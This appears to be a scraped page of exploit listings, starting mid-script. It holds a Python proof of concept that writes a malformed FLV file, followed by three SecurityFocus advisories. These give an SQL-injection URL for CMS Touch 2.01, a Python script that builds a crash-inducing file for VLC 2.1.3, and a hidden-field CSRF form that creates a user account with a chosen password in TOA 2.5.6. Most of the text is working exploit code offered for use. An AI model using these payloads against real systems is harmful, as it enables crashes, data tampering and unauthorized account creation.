x19\x36\x17\x71\x83\xC0\xAA\x98\xA5\x1A\x61\x99\xD9\xB3\x19\x27\x9F\xE9\x86\x38\xEF\x98\xA3\x02\x29\x96\x0B\xBB\x99\xD4\xA2\x29\x90\xD8\xC2\x86\x00\x71\x87\xE0\x3E\x18\x87\x90\x29\x8B\x30\xBA\x19\x28\x18\xC1\x83\xC0\x78\x98\x23\x05\x79\x89\x58\x53\x98\xC6\x14\x01\x90\xD8\x7A\x98\xE6\x09\x01\x90\x8A\x52\x98\xE7\x80\x61\x8A\x28\x95\x18\x87\x8B\x31\x8F\xC2\x99\x83\x84\x69\x94\x62\x51\xD9\xCC\xE1\xBA\x89\x31\xAC\xE1\xD9\x9E\x08\x71\xA8\x06\x89\x8B\x82\x11\x95\x81\xC9\xA1\xCE\x10\x63\x52\x61\x88\xDE\x62\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x03\xE1\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\xF0\x2F\xAD\x01\x16\x01\x7B\xDD\x4C\x00\x00\x03\x48\x00\x00\x00\x00\x58\x8A\x67\xD9\x6A\x63\xC1\x88\x66\x52\x00\x62\xD9\x10\x62\xF0\x88\x66\x88\xE0\x63\x18\x3A\x6F\x13\x0E\x62\xB1\x28\x65\xBA\x82\x70\xDA\xC0\x66\xD2\xD0\x69\x31\xCA\x64\x58\x96\x64\x00\x96\xB0\xA6\x56\x0E\xA6\x5D\xA7\xE6\x20\x11\x46\x58\x87\x66\x2F\x85\xE1\xC2\xE1\x83\x60\x79\x8F\xA4\xE9\x8F\xA0\xC1\x84\x80\x10\x90\xC2\x61\x38\x70\x60\x10\x30\x3A\x03\x18\x26\x0F\x18\x48\x05\x98\x5E\x14\x8B\x01\x68\x73\x22\x0E\x22\x10\xD2\x95\x3E\xC0\x81\x2C\xC3\x50\x25\xCB\x74\x50\x02\x5F\xC1\xA0\xF8\xC1\x90\x3A\x38\xAC\x0E\xAE\x4F\xB4\x74\x00\x13\x34\xE1\x6F\xFF\xFF\xFA\x31\xD5\x21\x80\x64\x0A\x99\x80\x16\x29\xD9\x81\xEA\x20\xB9\x84\x60\x30\x91\x89\x20\x32\x89\x81\xB6\x24\xA1\x8B\x26\x98\xF9\x9E\xBC\x25\x29\x80\xCE\x23\xA1\x85\xD2\x2A\x09\x93\x7A\x24\xB9\x86\x56\x8B\x31\x80\x12\x19\x29\x9F\x94\x71\xB9\x84\x6C\x13\x89\x84\x40\x94\x19\xD7\x94\xA9\x9C\xDA\x1D\x1A\x1C\x0D\x01\x86\x90\xD4\x1D\x65\xD5\x79\xAA\x91\xA2\x99\x67\x8A\x99\xA7\x90\xC5\x99\x6A\x8E\x61\x91\x21\x56\x18\x6B\x3F\x41\xE3\xB4\x7B\x19\x2F\x9B\x21\x8D\xA2\x56\x19\x02\x92\x59\xA0\x11\x30\x98\x94\x15\x21\x84\xD1\x28\x19\xEE\x92\xE1\x8C\x71\x62\x98\xC5\x35\x99\x8F\x49\xA3\x19\xA5\x83\x01\x8A\x48\x8A\x9A\xA0\x33\x09\xBE\x0B\x4C\x19\x49\x88\x69\x82\x88\x4C\x99\x0D\x07\xC1\x83\xE0\x46\x98\x44\x86\xD9\x8A\xA0\xBB\x99\xB5\x05\xF9\x86\xE8\x5E\x18\x39\x08\xC1\x86\xE0\x07\x80\x02\x24\xC8\x8C\x2D\xCC\x91\x88\x2C\xCD\x64\x54\x8C\x5D\xC4\xF4\xC1\x6C\x4A\xCE\xB6\x73\x8C\xED\x87\x8C\xC8\x2F\x0F\x13\x73\xCD\x4A\x3D\xCC\x4E\x01\xCC\xA7\x1D\xCD\x62\x23\x0C\x41\x0F\x0C\x71\x3D\x0C\xE8\x22\x0C\x9C\x26\xCC\xBB\x23\x4C\x33\x3D\x8C\x0C\x16\x00\x00\x01\xAE\x09\x00\x00\xC5\x00\x03\xE9\x00\x00\x00\x00\x22\x00\x00\x84\x3E\xB1\x3F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC\x2C\x64\xDB\xC6\xD9\x34\x4A\x2F\xB2\x6B\xDC\x10\x02\x7F\xFF\xF0\x38\xFD\x93\x6F\xA5\xE4\xBF\x90\xFE\x78\x07\x83\x00\x1E\x0C\x00\x80\x30\x02\xC0\xC0\x07\x00\x70\x94\x10\x00\x38\x48\x00\xD8\x10\x4B\x8B\xAA\xB1\x24\xBE\x78\x7F\x62\x99\x2F\xF2\xB0\xA0\xFF\xF7\xBF\x81\x80\x6E\x04\x1F\x17\x41\x2A\x04\x32\xF8\x3E\x8D\x2A\xDE\x42\x28\x51\x24\x4A\xF8\x97\x93\xCA\xF0\x02\x1E\x82\x10\x43\x2E\x08\x57\xF4\xBC\x7D\x15\xCB\x31\xC0\x6B\xEE\x0C\x03\x71\x72\xA1\x28\x18\x07\x10\x0F\x2E\x2E\xC1\xE2\xA1\xFD\x9E\xC6\x8F\x7F\x7F\x5B\x7F\x6D\xB7\x6B\xFF\xA0\x67\x24\x8B\x39\xFE\xDD\xB6\xCE\x4B\x76\x38\x33\xFE\xFE\xFE\xFE\xFF\xFF\xFF\xFF\x8B\xFA\x7B\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x00\x00\xD0\x08\x00\x01\xA3\x00\x03\xFB"
outfile = file("poc.flv", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67377/info

CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CMS Touch 2.01 is vulnerable; other versions may also be affected. 

http://www.example.com/cmstouch/pages.php?Page_ID=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/67315/info

VLC Media Player is prone to a memory-corruption vulnerability.

Attackers can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

VLC Media Player 2.1.3 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
data =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
outfile = file("poc.wave", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67291/info

TOA is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

TOA 2.5.6 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/tao/Users/add" method="post" name="main">
<input type="hidden" name="user_form_sent" value="1">
<input type="hidden" name="tao.forms.instance" value="1">
<input type="hidden" name="http_2_www_0_w3_0_org_1_2000_1_01_1_rdf-schema_3_label" value="User+5">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName" value="First Name">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName" value="Last Name">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail" value="user@mail.com">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_login" value="immuniweb">
<input type="hidden" name="password1" value="immuniweb1">
<input type="hidden" name="password2" value="immuniweb1">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userDefLg" value="http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langen-US">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg" value="http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langen-US">
<input type="hidden" name="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_0" value="http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_GenerisRole">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>